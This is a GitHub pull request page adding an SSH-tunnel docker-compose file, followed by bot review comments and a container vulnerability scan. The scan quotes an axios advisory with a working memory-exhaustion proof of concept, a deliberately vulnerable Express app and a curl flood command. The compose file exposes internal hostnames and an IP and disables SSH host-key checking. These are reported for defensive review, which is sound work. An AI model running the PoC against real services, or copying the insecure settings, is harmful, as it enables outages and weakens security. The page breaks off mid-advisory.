
Conversation

@anatolyshipitz
Collaborator

@anatolyshipitz anatolyshipitz commented Oct 23, 2025

  • Introduced a new docker-compose.local.yml file for local development, enabling SSH tunneling for Redmine and MongoDB services.
  • Updated README.md to include instructions for using the new local development configuration, clarifying the usage of different docker-compose files for various environments.

These changes enhance the development workflow by providing a dedicated configuration for local setups.
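
For reference, the override is applied by stacking compose files with -f; a typical invocation (mirroring the README instructions and the walkthrough below; the down counterpart is an assumed convenience, not quoted from the README) looks like this:

# Start the stack with the local override (SSH tunnels + host mappings for the local worker)
docker compose -f docker-compose.yml -f docker-compose.local.yml up

# Stop and remove the local stack when done (assumed counterpart command)
docker compose -f docker-compose.yml -f docker-compose.local.yml down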

Summary by CodeRabbit

  • New Features

    • Added a local docker-compose override to support SSH tunnels to remote services and host mappings for local workers.
  • Documentation

    • Reorganized and clarified local development setup with clearer section labels and workflow distinctions.
    • Added guidance for using a local docker-compose override and notes on local data persistence.
    • Improved troubleshooting and service health check guidance with clearer formatting.
    • Expanded GitHub MCP configuration steps with explicit setup and examples.
  • Tests

    • Stabilized timer-related tests by enabling controlled timer setup and teardown.

@coderabbitai

coderabbitai bot commented Oct 23, 2025

Walkthrough

Adds a new docker-compose.local.yml with SSH-tunnel helper services and a local Temporal worker, updates README with Local Development instructions and GitHub MCP token/secret steps, and modifies a worker test to use fake timers and cleanup.

Changes

  • Documentation (README.md): Renamed and reordered sections (e.g., "Development" → "Local Development"), added explicit instructions to run docker-compose.local.yml with -f, separated local vs default development flows, updated production command syntax, expanded persistence and health-check examples, improved troubleshooting/logging formatting, and added GitHub MCP secret/token creation/editing steps.
  • Local compose override (docker-compose.local.yml): New compose override adding redmine-tunnel and mongo-tunnel (Alpine containers installing ssh and opening SSH tunnels using mounted ~/.ssh and an SSH_KEY env var), plus temporal-worker-main configured with .env and extra_hosts mappings to host-gateway for Mongo instances on the app-network.
  • Tests (workers/main/src/index.test.ts): Test harness updated to enable fake timers in beforeEach (vi.useFakeTimers()) and to clear timers and restore real timers in afterEach (vi.clearAllTimers(), vi.useRealTimers()).
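
A minimal sketch of that timer setup/teardown (Vitest; the surrounding suite context is illustrative, not the actual test file):

import { afterEach, beforeEach, vi } from 'vitest';

beforeEach(() => {
  // Fake timers make any setTimeout-driven behaviour deterministic in tests.
  vi.useFakeTimers();
});

afterEach(() => {
  // Drop any timers still pending from the test, then restore the real clock.
  vi.clearAllTimers();
  vi.useRealTimers();
});

// Tests that rely on a pending timeout should advance the clock explicitly,
// e.g. vi.advanceTimersByTime(100), before asserting on the delayed behaviour.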

Sequence Diagram(s)

sequenceDiagram
  autonumber
  participant Dev as Developer
  participant Compose as docker compose (-f ...)
  participant Redmine as redmine-tunnel
  participant Mongo as mongo-tunnel
  participant Worker as temporal-worker-main
  participant Remote as Remote DBs

  Dev->>Compose: docker compose -f docker-compose.yml -f docker-compose.local.yml up
  Compose->>Redmine: create/start container (Alpine + ssh)
  Compose->>Mongo: create/start container (Alpine + ssh)
  Compose->>Worker: create/start temporal worker (env_file + extra_hosts)
  Redmine->>Remote: ssh tunnel local:3306 -> remote MySQL
  Mongo->>Remote: ssh tunnel local:31000 -> remote Mongo
  Worker->>Mongo: connect via forwarded host-gateway ports
  Note right of Worker: uses forwarded ports to reach remote services

Estimated code review effort

🎯 2 (Simple) | ⏱️ ~10 minutes

Areas to check:

  • SSH tunnel command correctness and security (mounted keys, env var SSH_KEY) in docker-compose.local.yml.
  • extra_hosts mapping correctness for temporal-worker-main.
  • Test timer usage and proper cleanup in workers/main/src/index.test.ts.

Possibly related PRs

Suggested reviewers

  • killev
  • sadmoondog

Poem

🐇
I tunneled through keys and midnight air,
So containers speak with distant care.
Compose brings life, the worker hums,
Local hops begin — hooray, here it comes! 🥕

Pre-merge checks and finishing touches

❌ Failed checks (1 warning)
  • Docstring Coverage: ⚠️ Warning. Docstring coverage is 0.00%, which is below the required threshold of 80.00%. Resolution: run @coderabbitai generate docstrings to improve docstring coverage.
✅ Passed checks (2 passed)
  • Description Check: ✅ Passed. Check skipped because CodeRabbit's high-level summary is enabled.
  • Title Check: ✅ Passed. The pull request title "Add local development configuration with docker-compose.local.yml" directly aligns with the primary change in this PR, which is the introduction of a new docker-compose.local.yml file that provides SSH tunneling configuration for local development. The title is specific and clear enough that a reviewer scanning the repository history would immediately understand the core purpose of the change. While the PR also includes README updates explaining how to use the new configuration and a minor test file modification, the title appropriately captures the main focus of the changeset.
✨ Finishing touches
  • 📝 Generate docstrings
  • 🧪 Generate unit tests (beta)
    • Create PR with unit tests
    • Post copyable unit tests in a comment
    • Commit unit tests in branch chore/docker-compose-local-explicit

📜 Recent review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between f629b57 and 8b253f4.

📒 Files selected for processing (3)
  • README.md (7 hunks)
  • docker-compose.local.yml (1 hunks)
  • workers/main/src/index.test.ts (2 hunks)
✅ Files skipped from review due to trivial changes (1)
  • docker-compose.local.yml
🚧 Files skipped from review as they are similar to previous changes (2)
  • workers/main/src/index.test.ts
  • README.md
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check



@coderabbitai coderabbitai bot left a comment


Actionable comments posted: 3

🧹 Nitpick comments (1)
README.md (1)

195-200: Expand troubleshooting for local development SSH tunnels.

The Troubleshooting section (lines 195-200) covers container logs and port availability but misses guidance for SSH tunnel issues specific to local development:

  • Connection refused on port 3306/31000
  • Host key verification errors
  • SSH key permission issues
  • Authentication failures

Consider adding:

**SSH Tunnel Issues (local development):**

- Verify SSH key permissions: `chmod 600 ~/.ssh/id_rsa`
- Test SSH connection manually: `ssh -i ~/.ssh/id_rsa ubuntu@your_host`
- Check tunnel logs: `docker logs redmine-tunnel` or `docker logs mongo-tunnel`
- Verify port forwarding: `netstat -an | grep 3306` and `netstat -an | grep 31000`
📜 Review details

Configuration used: Path: .coderabbit.yml

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 0dc0722 and 9345894.

📒 Files selected for processing (2)
  • README.md (7 hunks)
  • docker-compose.local.yml (1 hunks)
🧰 Additional context used
🧠 Learnings (6)
📚 Learning: 2025-07-28T16:44:50.073Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/project-structure.mdc:0-0
Timestamp: 2025-07-28T16:44:50.073Z
Learning: The project architecture must include interconnected services: n8n, Temporal Server, Temporal UI, PostgreSQL, and OpenSearch, each running on their specified ports.

Applied to files:

  • README.md
📚 Learning: 2025-06-24T12:29:29.869Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/service-configuration.mdc:0-0
Timestamp: 2025-06-24T12:29:29.869Z
Learning: Health verification scripts (such as scripts/check_services.sh) should check the accessibility of all critical service endpoints (HTTP, gRPC, database ports) to ensure the stack is running as expected.

Applied to files:

  • README.md
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to volumes/**/* : All service data must be persisted in Docker volumes mapped to the local volumes/ directory, such as ./volumes/n8n_data, ./volumes/opensearch-data, and ./volumes/postgresql-data

Applied to files:

  • README.md
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : Services must communicate over an internal Docker network with only the specified ports exposed: n8n (5678), Temporal (7233), Temporal UI (8080), PostgreSQL (5432), and OpenSearch (9200)

Applied to files:

  • README.md
📚 Learning: 2025-07-28T16:44:24.081Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/docker-configuration.mdc:0-0
Timestamp: 2025-07-28T16:44:24.081Z
Learning: Applies to docker-compose.yml : All service configurations, including service dependencies, volume mounts, network configuration, environment variables, and port mappings, must be defined in docker-compose.yml

Applied to files:

  • README.md
📚 Learning: 2025-06-24T12:29:29.869Z
Learnt from: CR
PR: speedandfunction/automatization#0
File: .cursor/rules/service-configuration.mdc:0-0
Timestamp: 2025-06-24T12:29:29.869Z
Learning: Troubleshooting containerized services should include checking container logs, verifying port availability, ensuring sufficient Docker resources, rerunning setup scripts for volume issues, and checking service health endpoints.

Applied to files:

  • README.md
⏰ Context from checks skipped due to timeout of 90000ms. You can increase the timeout in your CodeRabbit configuration to a maximum of 15 minutes (900000ms). (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (3)
docker-compose.local.yml (1)

32-38: Verify temporal-worker-main configuration and .env dependency.

The temporal-worker-main service relies on an .env file but has minimal inline configuration shown. Ensure:

  1. The .env file exists and contains required environment variables for this service
  2. The extra_hosts mapping to host-gateway is intentional for DNS resolution of MongoDB replicas from within the container
  3. Confirm this service is compatible with the SSH tunnels defined above (port mappings align)

Consider documenting the expected .env variables in a .env.local.example file.

README.md (2)

59-77: Clear local development documentation added.

Lines 59-77 properly document the three deployment scenarios (Local Development, Development, Production) with correct docker-compose command syntax. The explicit mention of the -f flag and the need to specify docker-compose.local.yml is helpful.


172-181: Review comment is architecturally inaccurate relative to actual implementation.

The review identifies a valid gap—SSH tunnel setup for local development is undocumented in README.md—but proposes environment variables (REDMINE_SSH_USER, REDMINE_SSH_HOST, REDMINE_DB_HOST, REDMINE_FORWARD_HOST) and .env.local configuration that do not exist in the actual docker-compose.local.yml.

The actual docker-compose.local.yml contains hardcoded SSH hosts in command strings:

  • redmine-tunnel: ssh -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com (hardcoded)
  • mongo-tunnel: ssh -i /root/.ssh/id_rsa ubuntu@forecasting-v2.gluzdov.com (hardcoded)

The SSH_KEY environment variable is set but unused dynamically in the current implementation.

What actually needs documentation (lines 59-61, "Local Development" section):

  • SSH key setup requirement (~/.ssh/id_rsa)
  • What tunnel services do (forward remote database ports)
  • SSH troubleshooting guidance

The review suggests adding .env.local parametrization that would require refactoring the docker-compose.local.yml itself—this is beyond documentation and mischaracterizes the current setup.

Likely an incorrect or invalid review comment.
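
For what it's worth, a hedged sketch of the README addition those three points imply (wording is illustrative; the ports and log commands come from the compose snippets and troubleshooting guidance in this review):

Local Development: SSH tunnel prerequisites
  • Ensure your private key exists at ~/.ssh/id_rsa; it is mounted read-only into the tunnel containers.
  • redmine-tunnel forwards the remote Redmine database to localhost:3306; mongo-tunnel forwards the remote MongoDB to localhost:31000.
  • If a tunnel fails, check docker logs redmine-tunnel / docker logs mongo-tunnel and verify key permissions (chmod 600 ~/.ssh/id_rsa).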

Comment on lines +2 to +15
  redmine-tunnel:
    container_name: redmine-tunnel
    image: alpine:latest
    command: >
      sh -c "apk add --no-cache openssh &&
      ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
    volumes:
      - ~/.ssh:/root/.ssh:ro
    ports:
      - '3306:3306'
    networks:
      - app-network
    environment:
      - SSH_KEY=/root/.ssh/id_rsa

⚠️ Potential issue | 🔴 Critical

Critical: Hardcoded infrastructure endpoints and credentials exposed.

Line 7 and other lines throughout the redmine-tunnel service expose sensitive infrastructure details that must never be committed:

  • Hardcoded staging hostname: ubuntu@staging.forecasting-v2.gluzdov.com
  • Hardcoded AWS RDS endpoint: redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com
  • Hardcoded internal IP: 10.4.3.184:31000

These represent production/staging infrastructure and should be externalized to environment variables or a .env.local file that is excluded from version control.

Refactor to use environment variable substitution:

 services:
   redmine-tunnel:
     container_name: redmine-tunnel
     image: alpine:latest
     command: >
       sh -c "apk add --no-cache openssh && 
-             ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
+             ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ${REDMINE_SSH_USER}@${REDMINE_SSH_HOST} -N -L 0.0.0.0:3306:${REDMINE_DB_HOST}:3306 -L 0.0.0.0:31000:${REDMINE_FORWARD_HOST}:31000"

Ensure .env.local is added to .gitignore and create a .env.local.example template with placeholder values.
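
As a companion to that suggestion, a minimal .env.local.example sketch (placeholder values only; the variable names are the ones proposed in the diff above, not variables that exist in the current compose file):

# .env.local.example -- placeholders only, never commit real hosts or keys
REDMINE_SSH_USER=ubuntu
REDMINE_SSH_HOST=ssh-bastion.example.com
REDMINE_DB_HOST=redmine-db.example.com
REDMINE_FORWARD_HOST=10.0.0.10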

🤖 Prompt for AI Agents
In docker-compose.local.yml around lines 2 to 15 the redmine-tunnel service
contains hardcoded sensitive endpoints (staging SSH host, RDS endpoint and
internal IP/port); replace those literal values with environment-variable
placeholders (e.g. ${SSH_REMOTE_USER}@${SSH_REMOTE_HOST}, ${RDS_HOST},
${INTERNAL_IP}:${INTERNAL_PORT}) and reference them via docker-compose variable
substitution, ensure the SSH key path is configurable (e.g. ${SSH_KEY_PATH})
rather than hardcoded, and update the compose file to read from a .env.local
file; add .env.local to .gitignore and create a .env.local.example with
placeholder values for all new variables so no secrets are committed.

Comment on lines +6 to +15
      sh -c "apk add --no-cache openssh &&
      ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
    volumes:
      - ~/.ssh:/root/.ssh:ro
    ports:
      - '3306:3306'
    networks:
      - app-network
    environment:
      - SSH_KEY=/root/.ssh/id_rsa

⚠️ Potential issue | 🟠 Major

Major: SSH security misconfigurations and unused environment variable.

Multiple SSH-related issues:

  1. Line 6: StrictHostKeyChecking=no disables host key verification, bypassing critical SSH security. This should only be used with extreme caution and be justified in comments.

  2. Line 15: SSH_KEY environment variable is defined but never used in the actual SSH command (line 7). The command hardcodes /root/.ssh/id_rsa instead. This inconsistency suggests incomplete refactoring or dead code.

  3. Line 7: SSH key path is hardcoded to /root/.ssh/id_rsa, assuming this specific filename. Consider using the SSH_KEY env var consistently or making it configurable.

Apply this diff to fix the inconsistency:

   redmine-tunnel:
     container_name: redmine-tunnel
     image: alpine:latest
     command: >
       sh -c "apk add --no-cache openssh && 
-             ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@staging.forecasting-v2.gluzdov.com -N -L 0.0.0.0:3306:redmine-pr-rds-db-read.c1kaki1qbk4o.us-east-1.rds.amazonaws.com:3306 -L 0.0.0.0:31000:10.4.3.184:31000"
+             ssh -o StrictHostKeyChecking=accept-new -i ${SSH_KEY} ${REDMINE_SSH_USER}@${REDMINE_SSH_HOST} -N -L 0.0.0.0:3306:${REDMINE_DB_HOST}:3306 -L 0.0.0.0:31000:${REDMINE_FORWARD_HOST}:31000"
     volumes:
       - ~/.ssh:/root/.ssh:ro
     ports:
       - '3306:3306'
     networks:
       - app-network
     environment:
       - SSH_KEY=/root/.ssh/id_rsa

Consider StrictHostKeyChecking=accept-new as a safer alternative to no, which accepts new keys but still validates known hosts.

Committable suggestion skipped: line range outside the PR's diff.

🤖 Prompt for AI Agents
In docker-compose.local.yml around lines 6 to 15, the SSH command disables
host-key verification and hardcodes the private key path while the SSH_KEY env
var is unused; replace StrictHostKeyChecking=no with
StrictHostKeyChecking=accept-new (or add a brief comment if no change is
allowed), remove the hardcoded /root/.ssh/id_rsa in the ssh command and
reference the SSH_KEY environment variable instead (or remove SSH_KEY if you
prefer a fixed path), and ensure the mounted volume and permissions match the
chosen key path; keep the SSH_KEY env var consistent with the command or delete
it to avoid dead configuration.

Comment on lines +17 to +30
  mongo-tunnel:
    container_name: mongo-tunnel
    image: alpine:latest
    command: >
      sh -c "apk add --no-cache openssh &&
      ssh -o StrictHostKeyChecking=no -i /root/.ssh/id_rsa ubuntu@forecasting-v2.gluzdov.com -N -L 0.0.0.0:31000:10.4.3.184:31000"
    volumes:
      - ~/.ssh:/root/.ssh:ro
    ports:
      - '31000:31000'
    networks:
      - app-network
    environment:
      - SSH_KEY=/root/.ssh/id_rsa

⚠️ Potential issue | 🔴 Critical

Critical & Major: Hardcoded infrastructure endpoints and SSH misconfigurations (same as redmine-tunnel).

The mongo-tunnel service contains identical issues:

  • Line 22: Hardcoded hostname ubuntu@forecasting-v2.gluzdov.com and internal IP 10.4.3.184
  • Line 22: StrictHostKeyChecking=no disables host key verification
  • Line 30: SSH_KEY env var defined but unused; command hardcodes /root/.ssh/id_rsa

Apply the same refactoring as redmine-tunnel to externalize sensitive data and fix SSH security configuration.

🤖 Prompt for AI Agents
In docker-compose.local.yml around lines 17 to 30, the mongo-tunnel service
hardcodes the remote user/host and internal IP, disables host key verification,
and declares SSH_KEY env var but never uses it; replace the hardcoded values
with environment variables (e.g. MONGO_SSH_USER, MONGO_SSH_HOST,
MONGO_TARGET_HOST, MONGO_TARGET_PORT) and use the declared SSH_KEY variable as
the identity file path in the ssh command instead of a hardcoded path; remove
StrictHostKeyChecking=no and ensure host verification by either mounting a
known_hosts file or running ssh-keyscan at container startup to populate
/root/.ssh/known_hosts; ensure the private key is mounted read-only from the
host and referenced via the SSH_KEY env var so no secrets are baked into the
image or compose file.
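
A hedged sketch of the known_hosts approach suggested above, using the variable names from that prompt (it assumes Alpine's openssh package provides ssh-keyscan; values would come from an uncommitted .env.local):

    command: >
      sh -c "apk add --no-cache openssh &&
      mkdir -p /root/.ssh &&
      ssh-keyscan -H ${MONGO_SSH_HOST} >> /root/.ssh/known_hosts &&
      ssh -i ${SSH_KEY} ${MONGO_SSH_USER}@${MONGO_SSH_HOST} -N -L 0.0.0.0:31000:${MONGO_TARGET_HOST}:${MONGO_TARGET_PORT}"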

@github-actions

github-actions bot commented Oct 23, 2025

🔍 Vulnerabilities of n8n-test:latest

📦 Image Reference: n8n-test:latest
  • digest: sha256:bec1e62deecd352f51c7319cb7773ec3d870fb42eff383635b3b2ecf80221ff2
  • vulnerabilities: critical: 2, high: 14, medium: 0, low: 0
  • platform: linux/amd64
  • size: 335 MB
  • packages: 1844
📦 Base Image node:22-alpine
also known as
  • 22-alpine3.22
  • 22.19-alpine
  • 22.19-alpine3.22
  • 22.19.0-alpine
  • 22.19.0-alpine3.22
  • jod-alpine
  • jod-alpine3.22
  • lts-alpine
  • lts-alpine3.22
digest: sha256:704b199e36b5c1bc505da773f742299dc1ee5a4c70b86d1eb406c334f63253c6
vulnerabilities: critical: 0, high: 1, medium: 2, low: 2
critical: 2 high: 2 medium: 0 low: 0 libxml2 2.13.8-r0 (apk)

pkg:apk/alpine/libxml2@2.13.8-r0?os_name=alpine&os_version=3.22

critical: CVE-2025-49796

Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.438%
EPSS Percentile: 62nd percentile
Description

critical: CVE-2025-49794

Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.251%
EPSS Percentile: 48th percentile
Description

high: CVE-2025-6021

Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.546%
EPSS Percentile: 67th percentile
Description

high: CVE-2025-49795

Affected range: <2.13.9-r0
Fixed version: 2.13.9-r0
EPSS Score: 0.141%
EPSS Percentile: 35th percentile
Description
critical: 0 high: 2 medium: 0 low: 0 xlsx 0.20.2 (npm)

pkg:npm/xlsx@0.20.2

high 7.8: CVE-2023-30533 (OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities)

Affected range: >=0
Fixed version: Not Fixed
CVSS Score: 7.8
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
EPSS Score: 4.328%
EPSS Percentile: 88th percentile
Description

All versions of SheetJS CE through 0.19.2 are vulnerable to "Prototype Pollution" when reading specially crafted files. Workflows that do not read arbitrary files (for example, exporting data to spreadsheet files) are unaffected.

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.19.3 can be downloaded via https://cdn.sheetjs.com/.

high 7.5: CVE-2024-22363 (OWASP Top Ten 2017 Category A9 - Using Components with Known Vulnerabilities)

Affected range: >=0
Fixed version: Not Fixed
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.079%
EPSS Percentile: 24th percentile
Description

SheetJS Community Edition before 0.20.2 is vulnerable to Regular Expression Denial of Service (ReDoS).

A non-vulnerable version cannot be found via npm, as the repository hosted on GitHub and the npm package xlsx are no longer maintained. Version 0.20.2 can be downloaded via https://cdn.sheetjs.com/.

critical: 0 high: 1 medium: 0 low: 0 n8n-nodes-base 1.107.0 (npm)

pkg:npm/n8n-nodes-base@1.107.0

high 8.8: GHSA-365g-vjw2-grx8 (Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'))

Affected range: <=1.113.0
Fixed version: Not Fixed
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Description

Impact

The Execute Command node in n8n allows execution of arbitrary commands on the host system where n8n runs. While this functionality is intended for advanced automation and can be useful in certain workflows, it poses a security risk if all users with access to the n8n instance are not fully trusted.

An attacker—either a malicious user or someone who has compromised a legitimate user account—could exploit this node to run arbitrary commands on the host machine, potentially leading to data exfiltration, service disruption, or full system compromise.

This vulnerability affects all n8n deployments where:

  • The Execute Command node is enabled, and
  • Not all user accounts are strictly controlled and trusted.

n8n.cloud is not impacted.

Patches

No code changes have been made to alter the behavior of the Execute Command node. The recommended mitigation is to disable the node by default in environments where it is not explicitly required.

Future n8n versions may change the default availability of this node.

Workarounds

Administrators can disable the Execute Command node by setting the following environment variable before starting n8n:

export NODES_EXCLUDE='["n8n-nodes-base.executeCommand"]'

References

n8n docs: Execute Command
n8n docs: Blocking nodes
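
In a compose-based deployment like this repository's, that mitigation could be wired in roughly as follows (the service name is an assumption; only the NODES_EXCLUDE variable and its value come from the advisory):

services:
  n8n:  # hypothetical service name
    environment:
      # Disable the Execute Command node by default
      - 'NODES_EXCLUDE=["n8n-nodes-base.executeCommand"]'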

critical: 0 high: 1 medium: 0 low: 0 curl 8.14.1-r1 (apk)

pkg:apk/alpine/curl@8.14.1-r1?os_name=alpine&os_version=3.22

high: CVE-2025-9086

Affected range: <8.14.1-r2
Fixed version: 8.14.1-r2
EPSS Score: 0.077%
EPSS Percentile: 24th percentile
Description
critical: 0 high: 1 medium: 0 low: 0 axios 1.11.0 (npm)

pkg:npm/axios@1.11.0

high 7.5: CVE-2025-58754 (Allocation of Resources Without Limits or Throttling)

Affected range: >=1.0.0, <1.12.0
Fixed version: 1.12.0
CVSS Score: 7.5
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EPSS Score: 0.025%
EPSS Percentile: 5th percentile
Description

Summary

When Axios runs on Node.js and is given a URL with the data: scheme, it does not perform HTTP. Instead, its Node http adapter decodes the entire payload into memory (Buffer/Blob) and returns a synthetic 200 response.
This path ignores maxContentLength / maxBodyLength (which only protect HTTP responses), so an attacker can supply a very large data: URI and cause the process to allocate unbounded memory and crash (DoS), even if the caller requested responseType: 'stream'.

Details

The Node adapter (lib/adapters/http.js) supports the data: scheme. When axios encounters a request whose URL starts with data:, it does not perform an HTTP request. Instead, it calls fromDataURI() to decode the Base64 payload into a Buffer or Blob.

Relevant code from [httpAdapter](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L231):

const fullPath = buildFullPath(config.baseURL, config.url, config.allowAbsoluteUrls);
const parsed = new URL(fullPath, platform.hasBrowserEnv ? platform.origin : undefined);
const protocol = parsed.protocol || supportedProtocols[0];

if (protocol === 'data:') {
  let convertedData;
  if (method !== 'GET') {
    return settle(resolve, reject, { status: 405, ... });
  }
  convertedData = fromDataURI(config.url, responseType === 'blob', {
    Blob: config.env && config.env.Blob
  });
  return settle(resolve, reject, { data: convertedData, status: 200, ... });
}

The decoder is in [lib/helpers/fromDataURI.js](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/helpers/fromDataURI.js#L27):

export default function fromDataURI(uri, asBlob, options) {
  ...
  if (protocol === 'data') {
    uri = protocol.length ? uri.slice(protocol.length + 1) : uri;
    const match = DATA_URL_PATTERN.exec(uri);
    ...
    const body = match[3];
    const buffer = Buffer.from(decodeURIComponent(body), isBase64 ? 'base64' : 'utf8');
    if (asBlob) { return new _Blob([buffer], {type: mime}); }
    return buffer;
  }
  throw new AxiosError('Unsupported protocol ' + protocol, ...);
}
  • The function decodes the entire Base64 payload into a Buffer with no size limits or sanity checks.
  • It does not honour config.maxContentLength or config.maxBodyLength, which only apply to HTTP streams.
  • As a result, a data: URI of arbitrary size can cause the Node process to allocate the entire content into memory.

In comparison, normal HTTP responses are monitored for size: the HTTP adapter accumulates the response into a buffer and will reject when totalResponseBytes exceeds [maxContentLength](https://github.com/axios/axios/blob/c959ff29013a3bc90cde3ac7ea2d9a3f9c08974b/lib/adapters/http.js#L550). No such check occurs for data: URIs.

PoC

const axios = require('axios');

async function main() {
  // this example decodes ~120 MB
  const base64Size = 160_000_000; // 120 MB after decoding
  const base64 = 'A'.repeat(base64Size);
  const uri = 'data:application/octet-stream;base64,' + base64;

  console.log('Generating URI with base64 length:', base64.length);
  const response = await axios.get(uri, {
    responseType: 'arraybuffer'
  });

  console.log('Received bytes:', response.data.length);
}

main().catch(err => {
  console.error('Error:', err.message);
});

Run with limited heap to force a crash:

node --max-old-space-size=100 poc.js

Since Node heap is capped at 100 MB, the process terminates with an out-of-memory error:

<--- Last few GCs --->
…
FATAL ERROR: Reached heap limit Allocation failed - JavaScript heap out of memory
1: 0x… node::Abort() …
…

Mini Real App PoC:
A small link-preview service that uses axios streaming, keep-alive agents, timeouts, and a JSON body. It allows data: URLs, for which axios ignores maxContentLength and maxBodyLength entirely and decodes the payload into memory on Node before streaming, enabling DoS.

import express from "express";
import morgan from "morgan";
import axios from "axios";
import http from "node:http";
import https from "node:https";
import { PassThrough } from "node:stream";

const keepAlive = true;
const httpAgent = new http.Agent({ keepAlive, maxSockets: 100 });
const httpsAgent = new https.Agent({ keepAlive, maxSockets: 100 });
const axiosClient = axios.create({
  timeout: 10000,
  maxRedirects: 5,
  httpAgent, httpsAgent,
  headers: { "User-Agent": "axios-poc-link-preview/0.1 (+node)" },
  validateStatus: c => c >= 200 && c < 400
});

const app = express();
const PORT = Number(process.env.PORT || 8081);
const BODY_LIMIT = process.env.MAX_CLIENT_BODY || "50mb";

app.use(express.json({ limit: BODY_LIMIT }));
app.use(morgan("combined"));

app.get("/healthz", (req,res)=>res.send("ok"));

/**
 * POST /preview { "url": "<http|https|data URL>" }
 * Uses axios streaming but if url is data:, axios fully decodes into memory first (DoS vector).
 */

app.post("/preview", async (req, res) => {
  const url = req.body?.url;
  if (!url) return res.status(400).json({ error: "missing url" });

  let u;
  try { u = new URL(String(url)); } catch { return res.status(400).json({ error: "invalid url" }); }

  // Developer allows using data:// in the allowlist
  const allowed = new Set(["http:", "https:", "data:"]);
  if (!allowed.has(u.protocol)) return res.status(400).json({ error: "unsupported scheme" });

  const controller = new AbortController();
  const onClose = () => controller.abort();
  res.on("close", onClose);

  const before = process.memoryUsage().heapUsed;

  try {
    const r = await axiosClient.get(u.toString(), {
      responseType: "stream",
      maxContentLength: 8 * 1024, // Axios will ignore this for data:
      maxBodyLength: 8 * 1024,    // Axios will ignore this for data:
      signal: controller.signal
    });

    // stream only the first 64KB back
    const cap = 64 * 1024;
    let sent = 0;
    const limiter = new PassThrough();
    r.data.on("data", (chunk) => {
      if (sent + chunk.length > cap) { limiter.end(); r.data.destroy(); }
      else { sent += chunk.length; limiter.write(chunk); }
    });
    r.data.on("end", () => limiter.end());
    r.data.on("error", (e) => limiter.destroy(e));

    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    limiter.pipe(res);
  } catch (err) {
    const after = process.memoryUsage().heapUsed;
    res.set("x-heap-increase-mb", ((after - before)/1024/1024).toFixed(2));
    res.status(502).json({ error: String(err?.message || err) });
  } finally {
    res.off("close", onClose);
  }
});

app.listen(PORT, () => {
  console.log(`axios-poc-link-preview listening on http://0.0.0.0:${PORT}`);
  console.log(`Heap cap via NODE_OPTIONS, JSON limit via MAX_CLIENT_BODY (default ${BODY_LIMIT}).`);
});

Run this app and send 3 post requests:

SIZE_MB=35 node -e 'const n=+process.env.SIZE_MB*1024*1024; const b=Buffer.alloc(n,65).toString("base64"); process.stdout.write(JSON.stringify({url:"data:application/octet-stream;base64,"+b}))' \
| tee payload.json >/dev/null
seq 1 3 | xargs -P3 -I{} curl -sS -X POST "$URL" -H 'Content-Type: application/json' --data-binary @payload.json -o /dev/null

Suggestions

  1. Enforce size limits
    For protocol === 'data:', inspect the length of the Base64 payload before decoding. If config.maxContentLength or config.maxBodyLength is set, reject URIs whose payload exceeds the limit.

  2. Stream decoding
